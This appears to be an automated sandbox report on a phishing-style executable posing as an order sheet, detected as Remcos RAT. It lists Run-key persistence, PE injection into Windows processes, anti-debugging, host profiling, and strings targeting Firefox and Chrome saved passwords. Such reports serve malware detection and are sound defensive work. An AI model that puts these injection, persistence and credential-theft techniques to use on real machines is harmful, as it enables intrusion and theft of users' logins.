18_2_00415D4C

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Cshgvzx			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Cshgvzx			Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe

8_2_0040D072

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Delayed program exit found

Show sources

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0040D455 Sleep,ExitProcess,		8_2_0040D455
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0040D455 Sleep,ExitProcess,		18_2_0040D455

Source: C:\Windows\SysWOW64\mobsync.exe TID: 6280	Thread sleep time: -75000s >= -30000s			Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe TID: 1412	Thread sleep count: 48 > 30			Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		8_2_00415A7A
Source: C:\Windows\SysWOW64\dialer.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		18_2_00415A7A

Source: C:\Windows\SysWOW64\mobsync.exe	API coverage: 7.6 %
Source: C:\Windows\SysWOW64\dialer.exe	API coverage: 2.0 %

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	8_2_004170AC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_00406176 FindFirstFileW,FindNextFileW,	8_2_00406176
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_0040A3AF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_0040A5CA
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004456A9 FindFirstFileExA,	8_2_004456A9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_004077EE
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	18_2_004170AC
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_00406176 FindFirstFileW,FindNextFileW,	18_2_00406176
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	18_2_0040A3AF
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	18_2_0040A5CA
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004456A9 FindFirstFileExA,	18_2_004456A9
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	18_2_004077EE
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_00407C57 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	18_2_00407C57

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

8_2_00406930

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_0042F07F

Source: C:\Windows\SysWOW64\mobsync.exe

8_2_0040D072

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_0044697D GetProcessHeap,

8_2_0044697D

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0043B789 mov eax, dword ptr fs:[00000030h]		8_2_0043B789
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0043B789 mov eax, dword ptr fs:[00000030h]		18_2_0043B789

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

Code function: 0_3_021BD330 LdrInitializeThunk,

0_3_021BD330

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0042F1CD SetUnhandledExceptionFilter,	8_2_0042F1CD
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0042F07F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004360A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_004360A3
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0042F62C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0042F62C
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0042F1CD SetUnhandledExceptionFilter,	18_2_0042F1CD
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_0042F07F
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004360A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_004360A3
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0042F62C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_0042F62C

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: EC0000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: F50000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: F60000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: F70000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: F80000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: ED0000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: EE0000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: EF0000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: F00000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: F10000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: F20000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: C60000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: CF0000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: D00000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: D10000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: D20000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: C70000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: C80000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: C90000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: CA0000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 10590000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: CB0000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: CC0000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 430000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 4C0000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 4D0000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 4E0000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 4F0000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 440000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 450000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 460000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 470000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 10590000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 480000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 490000	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 10590000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 430000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 4C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 4D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 4E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 4F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 440000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 450000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 460000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 470000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 480000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 490000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 10590000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 10590000 value starts with: 4D5A	Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\SysWOW64\mobsync.exe

8_2_00413ACA

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: EC0000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: F80000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: F00000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: F20000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Thread created: C:\Windows\SysWOW64\dialer.exe EIP: C60000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Thread created: C:\Windows\SysWOW64\dialer.exe EIP: D20000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Thread created: C:\Windows\SysWOW64\dialer.exe EIP: CA0000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Thread created: C:\Windows\SysWOW64\dialer.exe EIP: CC0000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Thread created: C:\Windows\SysWOW64\secinit.exe EIP: 430000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Thread created: C:\Windows\SysWOW64\secinit.exe EIP: 4F0000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Thread created: C:\Windows\SysWOW64\secinit.exe EIP: 470000	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Thread created: C:\Windows\SysWOW64\secinit.exe EIP: 490000	Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe		8_2_0040F4B7
Source: C:\Windows\SysWOW64\dialer.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe		18_2_0040F4B7

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Process created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe	Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_00414923 StrToIntA,mouse_event,

8_2_00414923

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetLocaleInfoA,	8_2_0040D585
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetLocaleInfoW,	8_2_00441069
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetLocaleInfoW,	8_2_00449143
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_0044926C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetLocaleInfoW,	8_2_00449373
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_00449440
Source: C:\Windows\SysWOW64\dialer.exe	Code function: GetLocaleInfoW,	18_2_00441069
Source: C:\Windows\SysWOW64\dialer.exe	Code function: GetLocaleInfoW,	18_2_00449143
Source: C:\Windows\SysWOW64\dialer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	18_2_0044926C
Source: C:\Windows\SysWOW64\dialer.exe	Code function: GetLocaleInfoW,	18_2_00449373
Source: C:\Windows\SysWOW64\dialer.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	18_2_00449440
Source: C:\Windows\SysWOW64\dialer.exe	Code function: GetLocaleInfoA,	18_2_0040D585
Source: C:\Windows\SysWOW64\dialer.exe	Code function: EnumSystemLocalesW,	18_2_00440B61
Source: C:\Windows\SysWOW64\dialer.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	18_2_00448B08

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_0042F2AB cpuid

8_2_0042F2AB

Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_00404E64 GetLocalTime,CreateEventA,CreateThread,

8_2_00404E64

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_0044190C _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

8_2_0044190C

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_004166F6 GetComputerNameExW,GetUserNameW,

8_2_004166F6

Stealing of Sensitive Information:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 8.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10591897.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10591897.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10591897.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10591897.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10591897.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10591897.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.492585881.00000000030E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331608026.0000000002F98000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356991304.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356879289.00000000006E8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492970715.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331771013.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mobsync.exe PID: 4692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dialer.exe PID: 6544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: secinit.exe PID: 6672, type: MEMORYSTR

Contains functionality to steal Firefox passwords or cookies

Show sources

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	8_2_0040A3AF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: \key3.db	8_2_0040A3AF
Source: C:\Windows\SysWOW64\dialer.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	18_2_0040A3AF
Source: C:\Windows\SysWOW64\dialer.exe	Code function: \key3.db	18_2_0040A3AF

Contains functionality to steal Chrome passwords or cookies

Show sources

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		8_2_0040A291
Source: C:\Windows\SysWOW64\dialer.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		18_2_0040A291

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 8.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10591897.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10591897.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10591897.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10591897.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10591897.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10591897.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.492585881.00000000030E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331608026.0000000002F98000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356991304.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356879289.00000000006E8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492970715.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331771013.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mobsync.exe PID: 4692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dialer.exe PID: 6544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: secinit.exe PID: 6672, type: MEMORYSTR

Detected Remcos RAT

Show sources

Source: mobsync.exe	String found in binary or memory: Remcos_Mutex_Inj
Source: mobsync.exe, 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov\|
Source: dialer.exe	String found in binary or memory: Remcos_Mutex_Inj
Source: dialer.exe, 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov\|
